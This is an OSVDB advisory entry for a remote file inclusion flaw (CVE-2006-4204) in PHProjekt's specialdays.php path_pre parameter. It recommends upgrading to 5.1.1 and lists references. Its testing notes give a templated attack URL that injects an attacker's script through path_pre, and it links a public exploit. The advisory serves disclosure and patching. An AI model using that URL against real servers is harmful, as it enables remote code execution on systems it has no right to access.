PHProjekt specialdays.php path_pre Variable Remote File Inclusion

2006-08-15T05:33:55
ID OSVDB:27953
Type osvdb
Reporter OSVDB
Modified 2006-08-15T05:33:55

Description

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts]

References:

Vendor URL: http://phprojekt.com/
Secunia Advisory ID: 21526
Related OSVDB ID: 27952
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0264.html
Mail List Post: http://attrition.org/pipermail/vim/2006-August/000994.html
Generic Exploit URL: http://www.milw0rm.com/exploits/2190
CVE-2006-4204